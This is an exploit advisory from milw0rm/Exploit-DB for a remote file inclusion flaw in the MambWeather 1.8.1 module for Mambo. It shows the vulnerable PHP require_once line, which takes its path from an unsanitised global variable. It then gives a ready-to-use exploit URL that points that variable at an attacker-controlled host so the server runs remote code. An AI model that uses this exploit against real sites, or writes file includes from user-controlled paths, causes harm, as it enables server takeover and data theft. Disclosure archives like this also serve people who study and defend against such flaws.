Mambo Module MambWeather 1.8.1 - Remote File Inclusion

EDB-ID:

2613


Author:

h4ntu

Type:

webapps


Platform:

PHP

Date:

2006-10-22


Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo module remote inclusion vulneribility

download : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip
 
bug found in file : MambWeather/Savant2/Savant2_Plugin_options.php
 
 <?php

 /**
 * Base plugin class.
 */
 global $mosConfig_absolute_path;

 require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';

 /**

exploit:

http://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]

Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet

# milw0rm.com [2006-10-22]